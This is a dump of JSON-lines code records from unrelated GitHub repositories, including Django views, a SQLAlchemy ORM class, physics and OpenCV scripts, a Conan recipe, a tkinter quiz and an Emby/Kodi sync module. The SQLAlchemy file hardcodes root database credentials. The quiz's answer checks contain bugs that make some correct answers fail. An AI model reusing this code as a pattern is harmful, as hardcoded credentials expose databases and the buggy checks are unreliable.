CarShop.objects.get(id=self.kwargs['pk'])\n if car.count > 1:\n car.count = car.count - 1\n car.save()\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass CarShopDeleteView(VentasPermisoMixin, DeleteView):\n \"\"\" Limpiar todo del carrito \"\"\"\n model = CarShop\n success_url = reverse_lazy('venta_app:venta-index')\n\n\nclass CarShopDeleteAll(VentasPermisoMixin, View):\n \n def post(self, request, *args, **kwargs):\n #\n CarShop.objects.all().delete()\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass ProcesoVentaSimpleView(VentasPermisoMixin, View):\n \"\"\" Procesa una venta simple, SIN IMPRIMIR, SIN COMPROBANTE DE PAGO \"\"\"\n\n def post(self, request, *args, **kwargs):\n #\n procesar_venta(\n self=self,\n type_invoce=Sale.SIN_COMPROBANTE,\n type_payment=Sale.CASH,\n user=self.request.user,\n )\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass ProcesoVentaVoucherView(VentasPermisoMixin, FormView):\n form_class = VentaVoucherForm\n success_url = '.'\n \n def form_valid(self, form):\n type_payment = form.cleaned_data['type_payment']\n type_invoce = form.cleaned_data['type_invoce']\n #\n venta = procesar_venta(\n self=self,\n type_invoce=type_invoce,\n type_payment=type_payment,\n user=self.request.user,\n )\n #\n if venta: \n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-voucher_pdf',\n kwargs={'pk': venta.pk },\n )\n )\n else:\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n \n\n\nclass VentaVoucherPdf(VentasPermisoMixin, View):\n \n def get(self, request, *args, **kwargs):\n venta = Sale.objects.get(id=self.kwargs['pk'])\n data = {\n 'venta': venta,\n 'detalle_productos': SaleDetail.objects.filter(sale__id=self.kwargs['pk'])\n }\n pdf = render_to_pdf('venta/voucher.html', data)\n return HttpResponse(pdf, content_type='application/pdf')\n\n\nclass SaleListView(VentasPermisoMixin, ListView):\n template_name = 'venta/ventas.html'\n context_object_name = \"ventas\" \n\n def get_queryset(self):\n return Sale.objects.ventas_no_cerradas()\n \nclass SaleDeleteView(VentasPermisoMixin, DetailView):\n template_name = 'venta/delete.html'\n model = Sale\n\nclass SaleAnulateView(VentasPermisoMixin, View):\n \"\"\" Anula la venta, pero no la elimina de la BD. Devuelve los productos al stock y\n descuenta del numero de venta de los productos \"\"\"\n def post(self, request, *args, **kwargs):\n sale = Sale.objects.get(id = self.kwargs['pk'])\n # No se elimina realmente de la base de datos, solo se coloca como anulado. Por temas de auditoria\n sale.anulate = True\n sale.save()\n # actualizmos sl stok y ventas\n SaleDetail.objects.restablecer_stok_num_ventas(sale.id)\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-list'\n )\n )","repo_name":"AdrianSilvaTj/djmarket","sub_path":"market/applications/venta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71625632570","text":"from sqlalchemy import *\n\nfrom sqlalchemy.orm import *\n\n#Settings to connect to mysql database\n\ndatabase_setting={\n 'database_type':'mysql',\n 'connector':'pymysql',\n 'user_name':'root',\n 'password':'admin',\n 'host_name':'192.168.44.143',\n 'database_name':'testsql',\n 'charset':'utf8',\n 'echo':'True'\n\n\n}\n\nclass User(object):\n def __init__(self,user_name,user_age,user_sex,user_score,user_subject):\n\n self.user_name=user_name\n self.user_age=user_age\n self.user_sex=user_sex\n self.user_score=user_score\n self.user_subject=user_subject\n\n\nclass UserManagerORM():\n def __init__(self):\n\n self.engine=create_engine(\n database_setting['database_type']+'+'+\n database_setting['connector']+'://'+\n database_setting['user_name']+':'+\n database_setting['password']+'@'+\n database_setting['host_name']+'/'+\n database_setting['database_name']\n\n\n\n )\n\n self.metadata=MetaData(self.engine)\n #\n self.user_table=Table('user',self.metadata,autoload=True)\n mapper(User,self.user_table)\n self.Session=sessionmaker()\n self.Session.configure(bind=self.engine)\n self.session=self.Session()\n\n def CreateNewUser(self,user_info):\n new_user=User(\n user_info['user_name'],\n user_info['user_age'],\n user_info['user_sex'],\n user_info['user_score'],\n user_info['user_subject']\n )\n\n\n\n self.session.add(new_user)\n self.session.commit()\n \n def GetUserByName(self,user_name):\n return self.session.query(User).filter_by(\n user_name=user_name\n ).all()[0]\n\n\n def GetAllUser(self):\n return self.session.query(User)\n\n\n def UpdateUserInfoByName(self,user_info):\n user_name=user_info['user_name']\n user_info_without_name={'user_age':user_info['user_age'],\n 'user_sex':user_info['user_sex'],\n 'user_score':user_info['user_score'],\n 'user_subject':user_info['user_subject']\n }\n\n self.session.query(User).filter_by(user_name=user_name).update(\n user_info_without_name\n )\n self.session.commit()\n\n def DeleteUserByName(self,user_name):\n user_need_to_delete=self.session.query(User).filter_by(user_name=user_name).all()[0]\n\n self.session.delete(user_need_to_delete)\n self.session.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tonywyl/tornado-","sub_path":"app01/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15805148196","text":"from django.urls import path\nfrom . import views\n\napp_name = 'analytics'\n\nurlpatterns = [\n path('', views.analytics_view, name='analytics'),\n path('/', views.analytics_view, name='analytics_add'),\n path('fetch-sticky-notes/', views.fetch_sticky_notes, name='fetch_sticky_notes'),\n path('create-or-add-to-board/', views.create_or_add_to_board, name='create_or_add_to_board'),\n path('board//sticky-notes/', views.fetch_board_sticky_notes, name='fetch_board_sticky_notes'),\n path('delete-sticky-note//', views.delete_sticky_note_from_board, name='delete_sticky_note_from_board'),\n path('/save_board/', views.save_board, name='save_board'),\n path('user_boards//', views.fetch_user_boards, name='fetch_user_boards'),\n]\n","repo_name":"MasterMind7777777/Finance-tracker","sub_path":"finance_tracker/analytics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71846978808","text":"# Model from Bruggen and Scannapieco 2016\nfrom numpy import sqrt, log10, log, exp\nfrom numpy import genfromtxt\n\nconst_A = 0.01\nconst_etac = 0.5\nconst_Tevap = 3.e6\nconst_cevap = 263.0\ngamma_minus1 = 2./3.\ngamma_plus1 = 8./3.\ngamma = 5./3.\nconst_etashock = 0.4\nconst_etarocket = 0.6\n\nchi0 = 300.0\nMach = 6.46\nNc = 1.5e20\nvh = 1700.0\n# mlr defined as (dm/dt)/m * tcc\ndef find_tevap(chi0, Mach, Nc):\n g = 3.5 * (const_etac / 0.5) * (const_A / 0.01) * (3.e6 / const_Tevap)\n g = g * (Nc / 3.e20) * Mach * sqrt(1000. / chi0)\n mssq = Mach * Mach\n fM = ((gamma_minus1) * mssq + 2.0) * (2.0 * gamma * mssq - gamma_minus1)\n fM = fM / (4.0 * gamma_plus1 * gamma_plus1 * mssq)\n fM = max(1.0, fM)\n mlr = const_A * fM * sqrt(chi0) * (1.0 - sqrt(1.0 + 4.0 * g)) / (2.0 * g)\n return 1./(-mlr)\n\ndef find_vc(t_evap, vh):\n v1 = const_etashock * vh / sqrt(chi0) * sqrt(Mach / 30. * t_evap)\n v2 = const_etarocket * const_cevap * sqrt(Mach / 30. / t_evap)\n return v1 + v2\n\ntab = genfromtxt(\"models_bs16_physical.dat\", names=True, dtype=('i8,S20,f8,f8,f8,f8,f8,f8'))\n\nfout = open(\"models_bs16_predictions.dat\", \"w\")\nfout.write(\"#ID\tModelname\ttevap\tvc\\n\")\nfor i in range(len(tab)):\n t_evap = find_tevap(tab['chi0'][i], tab['M'][i], tab['ncRc'][i])\n vc = find_vc(t_evap, tab['vh'][i])\n line = \"%d %12s %4.1f %4.1f\\n\" % (i, tab['Modelname'][i], t_evap, vc)\n fout.write(line)\nfout.close()\n","repo_name":"shuiyao/phew-py","sub_path":"physics/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73669819449","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"dataset/sudoku.jpg\",0)\nprint(img.shape)\n\nrows,cols = img.shape\n#perspecive : 4 input points\n#point1 p1(56,65) p2(368,52) p3(28,387) p4(389,390)\n#point2 p1(0,0) p2(300,0) p3(0,300) p4(300,300)\nw = 300\nh = 300\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\npts2 = np.float32([[0,0],[w,0],[0,h],[w,h]])\n\nM = cv2.getPerspectiveTransform(pts1,pts2)\nprint(M) #3x3 matrix\nres =cv2.warpPerspective(img,M,(300,300)) #300,300 = new img size (width,height)\ncv2.imshow(\"Original Image\",img)\ncv2.imshow(\"Result Image\",res)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"JiratchayaF/openCV_KMITL","sub_path":"Method/perspective.py","file_name":"perspective.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31936190495","text":"import os\n\nfrom conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.files import copy, get\nfrom conan.tools.layout import basic_layout\nfrom conan.tools.scm import Version\n\nrequired_conan_version = \">=1.52.0\"\n\n\nclass CppProjectFrameworkConan(ConanFile):\n name = \"cpp_project_framework\"\n description = \"C++ Project Framework is a framework for creating C++ projects.\"\n license = \"AGPL-3.0\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/sheepgrass/cpp_project_framework\"\n topics = (\"cpp\", \"project\", \"framework\", \"header-only\")\n\n package_type = \"header-library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n no_copy_source = True\n\n @property\n def _minimum_cpp_standard(self):\n return 14\n\n @property\n def _minimum_compilers_version(self):\n return {\n \"Visual Studio\": \"16\",\n \"msvc\": \"192\",\n \"gcc\": \"7\",\n \"clang\": \"6\",\n \"apple-clang\": \"10\",\n }\n\n def layout(self):\n basic_layout(self, src_folder=\"src\")\n\n def package_id(self):\n self.info.clear()\n\n def validate(self):\n if self.settings.os not in (\"Linux\", \"FreeBSD\", \"Windows\"):\n raise ConanInvalidConfiguration(f\"{self.name} is only supported on Linux and Windows\")\n\n compiler = self.settings.compiler\n\n if compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, self._minimum_cpp_standard)\n\n if compiler in (\"gcc\", \"clang\"):\n if not compiler.get_safe(\"libcxx\", \"\").startswith(\"libstdc++\"):\n raise ConanInvalidConfiguration(f\"{self.name} is only supported {compiler} with libstdc++\")\n\n min_version = self._minimum_compilers_version.get(str(compiler))\n if not min_version:\n self.output.warning(f\"{self.name} recipe lacks information about the {compiler} compiler support.\")\n else:\n if Version(compiler.version) < min_version:\n raise ConanInvalidConfiguration(\n f\"{self.name} requires C++{self._minimum_cpp_standard} support. \"\n f\"The current compiler {compiler} {compiler.version} does not support it.\"\n )\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def package(self):\n copy(self, \"LICENSE\",\n dst=os.path.join(self.package_folder, \"licenses\"),\n src=self.source_folder)\n copy(self, \"*.h\",\n dst=os.path.join(self.package_folder, \"include\", self.name),\n src=os.path.join(self.source_folder, self.name))\n\n def package_info(self):\n self.cpp_info.bindirs = []\n self.cpp_info.libdirs = []\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/cpp_project_framework/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"11160069529","text":"import numpy as np\nfrom numpy import cos, sin\n\n# Base Constants\nm = 3\nm1 = 1\nm2 = 1\n\nL1 = 5\nL2 = 3\n\ng = 9.8\n\nbeta = 0.5\nbeta1 = 0.2\nbeta2 = 0.2\n\n# Derived Constants\nq1 = m + m1 + m2\nq2 = (1/3*m1+m2)*L1*L1\nq3 = 1/3*m2*L2*L2\nq4 = (1/2*m1+m2)*L1\nq5 = 1/2*m2*L2\nq6 = 1/2*m2*L1*L2\n\n##########################################################################################################\n# written as D(theta)*theta_dotdot + C(theta, theta_dot)*theta_dot + G(theta) = H*u\n# \n# Constants: m, m1, m2, L1, L2, g, beta, beta1, beta2\n# Letting:\n# q1 = m + m1 + m2 q3 = 1/3*m2*L2^2 q5 = 1/2*m2*L2\n# q2 = (1/3*m1+m2)L1 q4 = (1/2*m1+m2)L1 q6 = 1/2*m2*L1*L2\n# \n# D(theta) = [ q1 q4*cos(theta1) q5*cos(theta2) ]\n# [ q4*cos(theta1) q2 q6*cos(theta1-theta2) ]\n# [ q5*cos(theta2) q6*cos(theta1-theta2) q3 ]\n#\n# C(theta, theta_dot) = [ beta -q4*theta1_dot*sin(theta_1) -q5*theta2_dot*sin(theta_2) ]\n# [ 0 beta1 q6*theta2_dot*sin(theta_1-theta2) ]\n# [ 0 -q6*theta1_dot*sin(theta1-theta2) beta2 ]\n# \n# G(theta) = [ 0 ]\n# [ -g*q4*sin(theta1) ]\n# [ -g*q5*sin(theta2) ]\n#\n# H = [1]\n# [0]\n# [0]\n##########################################################################################################\n# Function to represent first order model\n# X: state vector. expected to be [x, theta1, theta2, x_dot, theta1_dot, theta2_dot]\n# u: input force\ndef cart_double_pendulum_model(X, u):\n X_prime = np.zeros(6)\n # print(X)\n # x = X[0]\n theta1 = wrap_angle(X[1])\n theta2 = wrap_angle(X[2])\n x_dot = X[3]\n theta1_dot = X[4]\n theta2_dot = X[5]\n\n # Theta = np.matrix([x, theta1, theta2]).reshape(3,1)\n Theta_dot = np.matrix([x_dot, theta1_dot, theta2_dot]).reshape(3,1)\n\n D = np.array( [[ q1, q4*cos(theta1), q5*cos(theta2) ],\n [ q4*cos(theta1), q2, q6*cos(theta1-theta2) ],\n [ q5*cos(theta2), q6*cos(theta1-theta2), q3 ]], dtype=np.float64)\n Dinv = np.linalg.inv(D) # only really care about inv(D)\n # print(D)\n # print(Dinv)\n\n C = np.array([[ beta, -q4*theta1_dot*sin(theta1), -q5*theta2_dot*sin(theta2) ],\n [ 0, beta1, q6*theta2_dot*sin(theta1-theta2) ],\n [ 0, -q6*theta1_dot*sin(theta1-theta2), beta2 ]], dtype=np.float64)\n\n G = np.array([[ 0 ],\n [ -g*q4*sin(theta1) ],\n [ -g*q5*sin(theta2) ]], dtype=np.float64)\n\n H = np.array([[u],[0],[0]], dtype=np.float64)\n\n dd = Dinv@H - Dinv@C@Theta_dot - Dinv@G\n\n # Calculating derivative\n X_prime[0] = x_dot\n X_prime[1] = theta1_dot\n X_prime[2] = theta2_dot\n \n X_prime[3] = dd[0]\n X_prime[4] = dd[1]\n X_prime[5] = dd[2]\n return X_prime\n\n\ndef wrap_angle(angle):\n return (angle + np.pi) % (2*np.pi) - np.pi","repo_name":"stefantquach/double-pendulum-cart","sub_path":"scripts/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11099399388","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\n\nroot.geometry(\"800x800\")\n\nroot.title(\"Quiz Game App\")\n\nscrollbar = Scrollbar(root)\nscrollbar.pack(side=RIGHT, fill=Y)\n\nlabel = Label(root, text=\"Software Engineering Quiz \",\n width=28, height=4, font=(\"algerian\", 15))\nlabel.pack()\n\n\nclass Quiz:\n print('Welcome to the Software Engineering Quiz')\n score = 0\n total_questions = 4\n\n def __init__(self):\n # self.ask_question()\n pass\n\n def ask_question(self):\n answer = input('Are you ready to play the Quiz ? (yes/no) :')\n\n if answer.lower() == 'yes':\n answer = input(\n 'Question 1: What programming language was this quiz created in?')\n if answer.lower() == 'python':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer :(')\n\n answer = input('Question 2: What is software Engineering?')\n if answer.lower() == 'application of engineering principle to the design a software':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer :(')\n\n answer = input('Question 3: what does SDLC stand for?')\n if answer.lower() == 'software Development Life Cycle':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer :(')\n\n answer = input(\n 'Question 4: First phase of software development is:')\n if answer.lower() == 'requirement ananlysi':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer :(')\n\n print('Thankyou for Playing the Hacktoberfest quiz game, you attempted',\n self.score, \"questions correctly!\")\n mark = (self.score/self.total_questions)*100\n print('Marks obtained:', mark)\n print('BYE!')\n\n def get_score(self):\n return self.score\n\n def validate_question_one(self, question_one_value=''):\n if question_one_value.lower() == 'python':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer1')\n print('correct answer is python. ')\n return True if question_one_value.lower() == 'python' else False\n\n def validate_question_two(self, question_two_value):\n if question_two_value.lower() == 'application of engineering principle to the design a software':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer2')\n print('correct answer is application of engineering principle to the design a software. It is the Application of engineering principles to the design,development, and support of software and it helps to solve the challenges of low- quality software project. ')\n return True if question_two_value.lower() == 'application of engineering principle to the design a software' else False\n\n def validate_question_three(self, question_three_value):\n if question_three_value.lower() == 'software development life cycle':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer2')\n print('correct answer is software development life cycle. it is a method for designing, developing, and testing high-quality softwarte.')\n return True if question_three_value.lower() == 'software development life cycle' else False\n\n def validate_question_four(self, question_four_value):\n if question_four_value.lower() == 'requirement ananlysis':\n self.score += 1\n print('correct')\n else:\n print('Wrong Answer2')\n print('correct answer is requirement ananlysis, as based on it developer design and developed the software.')\n return True if question_four_value.lower() == 'requirement ananlysis' else False\n\n def evaluate(self):\n self.score = 0\n\n question_one_value = question_one.get()\n self.validate_question_one(question_one_value=question_one_value)\n\n question_two_value = question_two.get()\n self.validate_question_two(question_two_value=question_two_value)\n\n question_three_value = question_three.get()\n self.validate_question_three(question_three_value=question_three_value)\n\n question_four_value = question_four.get()\n self.validate_question_four(question_four_value=question_four_value)\n\n print('Thankyou for Playing the Hacktoberfest quiz game, you attempted',\n self.score, \"questions correctly!\")\n mark = (self.score/self.total_questions)*100\n my_label.config(text=\"Your score is \" + str(mark) + \"%\")\n print('Marks obtained:', mark)\n\n\nquiz = Quiz()\n\nw1_label = Label(root, text=\"Question 1: What programming language was this quiz created in?\", font=(\n \"arial\", 10), width=100, height=4)\nw1_label.pack()\nquestion_one = ttk.Combobox(\n root, value=[\"Python\", \"Java\", \"C++\"], width=50, height=4)\nw1_label.pack()\nquestion_one.current(0)\nquestion_one.pack()\n\nw1_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw1_label.pack()\n\nw2_label = Label(root, text=\"Question 2:What is software Engineering?\", font=(\n \"arial\", 10), width=200, height=4)\nw2_label.pack()\nquestion_two = ttk.Combobox(root, width=50, height=4, value=[\n \"Designing a software\", \"Testing a software\", \"Application of engineering principle to the design a software\", \"None of the above\"])\nquestion_two.current(0)\nquestion_two.pack()\n\nw2_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw2_label.pack()\n\n\nw3_label = Label(root, text=\"Question 3:what does SDLC stand for?\",\n font=(\"arial\", 10), width=200, height=4)\nw3_label.pack()\nquestion_three = ttk.Combobox(root, width=50, height=4, value=[\n \"System Design Life Cycle\", \"Software Design Life Cycle\", \"System Development Life Cycle\", \"Software Development Life Cycle\"])\nquestion_three.current(0)\nquestion_three.pack()\n\nw3_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw3_label.pack()\n\nw4_label = Label(root, text=\"Question 4: First phase of software development is:\", font=(\n \"arial\", 10), width=200, height=4)\nw4_label.pack()\nquestion_four = ttk.Combobox(root, width=50, height=4, value=[\n \"Coding\", \"Testing\", \"Design\", \"Requirement ananlysis\"])\nquestion_four.current(0)\nquestion_four.pack()\n\nw4_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw4_label.pack()\n\n\nbutton = Button(root, text=\"Submit\", font=(\n \"bell mt\", 10), command=quiz.evaluate)\nbutton.pack()\n\n\n# w6_label = Label(root,font=(\"arial\",10),width=100,height=4, textvariable=quiz.get_score())\nmy_label = Label(root,\n text=\"Score:\")\nmy_label.pack()\n\n\nroot.mainloop()\n","repo_name":"larymak/Python-project-Scripts","sub_path":"GAMES/Software-Eng-UI-Quiz/hacktoberfest_quiz.py","file_name":"hacktoberfest_quiz.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":929,"dataset":"github-code","pt":"77"} +{"seq_id":"30431269995","text":"\"\"\"\nKrom souboru s body si ulož a načti do druhého slovníku ještě soubor bonusy.json. Obsahuje bonusové body získané během semestru. Pozor, bonusové body získali jen někteří žáci.\n\nTvým úkolem je žákům přiřadit známky na základě součtu bodů z písemky a bonusových bodů. Bodová rozhraní (vztahují se na součet) najdeš zde:\n\n1: 90 a více\n2: 70-89\n3: 50-69\n4: 30-49\n5: 29 a méně\n\nVýsledný slovník ulož jako JSON do souboru znamky.json.\n\"\"\"\nimport json\nwith open(\"body.json\", encoding = \"utf-8\") as file:\n body = json.load(file)\n\nwith open(\"bonusy.json\", encoding = \"utf-8\") as file:\n bonusy = json.load(file)\n \nznamky = {}\n\nfor jmeno, body in body.items():\n bonus = 0\n if jmeno in bonusy:\n bonus = bonusy[jmeno]\n body += bonus\n if body >= 90:\n znamka = 1\n elif body >= 70:\n znamka = 2\n elif body >= 50:\n znamka = 3\n elif body >= 30:\n znamka = 4\n else:\n znamka = 5\n znamky[jmeno] = znamka\n \nwith open(\"znamky.json\", mode = \"w\", encoding = \"utf-8\") as file:\n json.dump(znamky, file, ensure_ascii=False, indent=4)","repo_name":"liubakame/reseni_ukolu_python2023","sub_path":"domaci_ukoly/ukol_03/bonusy.py","file_name":"bonusy.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72183264570","text":"import cv2\nimport numpy as np\n\nclass HSVConfig:\n def __init__(self):\n self.h_min = [146]\n self.h_max = [179]\n self.s_min = [110]\n self.s_max = [255]\n self.v_min = [169]\n self.v_max = [255]\n self.hsv_Lower = (self.h_min[0], self.s_min[0], self.v_min[0])\n self.hsv_Upper = (self.h_max[0], self.s_max[0], self.v_max[0])\n\n\n","repo_name":"NoELIEKT/embedded","sub_path":"HSVConfig.py","file_name":"HSVConfig.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34263032314","text":"import xbmc\nfrom . import common\n\n\nclass Movies:\n def __init__(self, EmbyServer, embydb, videodb):\n self.EmbyServer = EmbyServer\n self.emby_db = embydb\n self.video_db = videodb\n self.video_db.init_favorite_tags()\n\n def movie(self, item):\n if not common.library_check(item, self.EmbyServer, self.emby_db, \"Movie\"):\n return False\n\n if not common.verify_content(item, \"movie\"):\n return False\n\n xbmc.log(f\"EMBY.core.movies: Process item: {item['Name']}\", 1) # LOGINFO\n ItemIndex = 0\n common.SwopMediaSources(item) # 3D\n item['OriginalTitle'] = item.get('OriginalTitle', \"\")\n item['CommunityRating'] = item.get('CommunityRating', None)\n item['CriticRating'] = item.get('CriticRating', None)\n item['ShortOverview'] = item.get('ShortOverview', \"\")\n item['Settings'] = len(item['Librarys']) * [{}]\n common.set_mpaa(item)\n common.set_trailer(item, self.EmbyServer)\n\n for ItemIndex in range(len(item['Librarys'])):\n if item['KodiItemIds'][ItemIndex]: # existing item\n item['Settings'][ItemIndex] = self.video_db.get_settings(item['KodiFileIds'][ItemIndex])\n self.remove_movie(item['KodiItemIds'][ItemIndex], item['KodiFileIds'][ItemIndex], item['Id'], item['LibraryIds'][ItemIndex])\n\n if not common.get_file_path(item, \"movies\", ItemIndex):\n continue\n\n item['KodiItemIds'][ItemIndex] = self.video_db.create_movie_entry()\n item['KodiFileIds'][ItemIndex] = self.video_db.create_entry_file()\n item['KodiPathId'] = self.video_db.get_add_path(item['Path'], \"movies\")\n common.set_ContentItem(item, self.video_db, self.emby_db, self.EmbyServer, \"movie\", ItemIndex)\n item['Unique'] = self.video_db.add_uniqueids(item['KodiItemIds'][ItemIndex], item['ProviderIds'], \"movie\", 'imdb')\n item['RatingId'] = self.video_db.add_ratings(item['KodiItemIds'][ItemIndex], \"movie\", \"default\", item['CommunityRating'])\n\n if not item['ProductionLocations']:\n item['ProductionLocations'].append(\"\")\n\n self.video_db.add_movie(item['KodiItemIds'][ItemIndex], item['KodiFileIds'][ItemIndex], item['Name'], item['Overview'], item['ShortOverview'], item['Taglines'][0], item['RatingId'], item['Writers'], item['KodiArtwork']['poster'], item['Unique'], item['SortName'], item['RunTimeTicks'], item['OfficialRating'], item['Genre'], item['Directors'], item['OriginalTitle'], item['Studio'], item['Trailer'], item['KodiArtwork']['fanart'].get('fanart', \"\"), item['ProductionLocations'][0], item['Path'], item['KodiPathId'], item['PremiereDate'], item['Filename'], item['DateCreated'], item['UserData']['PlayCount'], item['UserData']['LastPlayedDate'], item['KodiParentIds'][ItemIndex])\n self.emby_db.add_reference(item['Id'], item['KodiItemIds'], item['KodiFileIds'], item['KodiPathId'], \"Movie\", \"movie\", [], item['LibraryIds'], item['ParentId'], item['PresentationUniqueKey'], item['UserData']['IsFavorite'], item['EmbyPath'], None, None, None)\n self.video_db.add_link_tag(common.MediaTags[item['Librarys'][ItemIndex]['Name']], item['KodiItemIds'][ItemIndex], \"movie\")\n self.video_db.set_Favorite(item['UserData']['IsFavorite'], item['KodiItemIds'][ItemIndex], \"movie\")\n self.video_db.add_genres_and_links(item['Genres'], item['KodiItemIds'][ItemIndex], \"movie\")\n\n if item['CriticRating']:\n item['CriticRating'] = float(item['CriticRating'] / 10.0)\n self.video_db.add_ratings(item['KodiItemIds'][ItemIndex], \"movie\", \"tomatometerallcritics\", item['CriticRating'])\n\n self.video_db.add_tags_and_links(item['KodiItemIds'][ItemIndex], \"movie\", item['TagItems'])\n self.emby_db.add_multiversion(item, \"Movie\", self.EmbyServer.API, self.video_db, ItemIndex)\n\n if item['Settings'][ItemIndex]:\n self.video_db.add_settings(item['KodiFileIds'][ItemIndex], item['Settings'][ItemIndex])\n\n # Add Special features\n if 'SpecialFeatureCount' in item:\n if int(item['SpecialFeatureCount']):\n SpecialFeatures = self.EmbyServer.API.get_specialfeatures(item['Id'])\n\n for SF_item in SpecialFeatures:\n eSF_item = self.emby_db.get_item_by_id(SF_item['Id'])\n common.get_streams(SF_item)\n SF_item['ParentId'] = item['Id']\n SF_item['Library'] = item['Library']\n SF_item['ServerId'] = item['ServerId']\n SF_item['KodiFileIds'] = item['KodiFileIds']\n SF_item['KodiItemIds'] = item['KodiItemIds']\n SF_item['LibraryIds'] = item['LibraryIds']\n SF_item['IntroStartPositionTicks'] = None\n SF_item['IntroEndPositionTicks'] = None\n SF_item['CreditsPositionTicks'] = None\n common.SwopMediaSources(SF_item) # 3D\n common.get_file_path(SF_item, \"movies\", ItemIndex)\n\n if not SF_item['FullPath']: # Invalid Path\n xbmc.log(f\"EMBY.core.movies: Invalid path: {SF_item['Id']}\", 3) # LOGERROR\n xbmc.log(f\"EMBY.core.movies: Invalid path: {SF_item}\", 0) # LOGDEBUG\n return False\n\n SF_item['KodiItemIds'][ItemIndex] = None\n SF_item['KodiFileIds'][ItemIndex] = None\n SF_item['KodiPathId'] = None\n\n if not eSF_item:\n self.emby_db.add_reference(SF_item['Id'], [], [], None, \"SpecialFeature\", None, [], item['LibraryIds'], item['Id'], SF_item['PresentationUniqueKey'], SF_item['UserData']['IsFavorite'], SF_item['EmbyPath'], None, None, None)\n xbmc.log(f\"EMBY.core.movies: ADD SpecialFeature {SF_item['Id']}: {SF_item['Name']}\", 1) # LOGINFO\n\n self.emby_db.add_streamdata(SF_item['Id'], SF_item['Streams'])\n\n if item['UpdateItems'][ItemIndex]:\n xbmc.log(f\"EMBY.core.movies: UPDATE movie [{item['KodiPathId']} / {item['KodiFileIds'][ItemIndex]} / {item['KodiItemIds'][ItemIndex]}] {item['Id']}: {item['Name']}\", 1) # LOGINFO\n else:\n xbmc.log(f\"EMBY.core.movies: ADD movie [{item['KodiPathId']} / {item['KodiFileIds'][ItemIndex]} / {item['KodiItemIds'][ItemIndex]}] {item['Id']}: {item['Name']}\", 1) # LOGINFO\n\n return not item['UpdateItems'][ItemIndex]\n\n def boxset(self, item):\n if not common.library_check(item, self.EmbyServer, self.emby_db, \"BoxSet\"):\n return False\n\n MoviesAssignedToBoxset = self.EmbyServer.API.get_Items(item['Id'], [\"Movie\", \"Video\"], True, False, {})\n\n for ItemIndex in range(len(item['Librarys'])):\n common.set_overview(item)\n\n if item['UpdateItems'][ItemIndex]:\n self.video_db.common.delete_artwork(item['KodiItemIds'][ItemIndex], \"set\")\n self.video_db.update_boxset(item['Name'], item['Overview'], item['KodiItemIds'][ItemIndex])\n else:\n xbmc.log(f\"EMBY.core.movies: SetId {item['Id']} not found\", 0) # LOGDEBUG\n item['KodiItemIds'][ItemIndex] = self.video_db.add_boxset(item['Name'], item['Overview'])\n\n # BoxSets\n CurrentBoxSetMovies = self.emby_db.get_item_by_parent_id(item['KodiItemIds'][ItemIndex], \"movie\")\n\n if CurrentBoxSetMovies:\n CurrentBoxSetMovies = dict(CurrentBoxSetMovies)\n else:\n CurrentBoxSetMovies = {}\n\n for MovieAssignedToBoxset in MoviesAssignedToBoxset:\n MovieID = int(MovieAssignedToBoxset['Id'])\n\n if 